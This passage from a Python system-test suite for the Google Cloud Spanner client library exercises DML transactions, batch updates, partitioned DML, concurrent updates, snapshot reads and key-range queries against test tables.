with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
(
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_transaction_batch_update_w_parent_span(self):
try:
from opentelemetry import trace
except ImportError:
return
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
update_statement = (
"UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
{"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
nonesuch = "nonesuch@example.com"
target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield (
index,
"First%09d" % (index,),
"Last%09d" % (max_index - index),
"test-%09d@example.com" % (index,),
)
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
row_count = 400
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
row_count = 40
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
row_count = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=ddl_statements + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
committed = self._set_up_table(row_count, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(row_count)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
row_count = 3000
start = 1000
end = 2000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
single_key = KeyRange(start_closed=[start], end_open=[start + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : start + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[start], end_closed=[end])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : end + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[start], end_open=[end])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start:end]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[start], end_open=[end])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[start], end_closed=[end])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
row_count = 3000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=sql,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
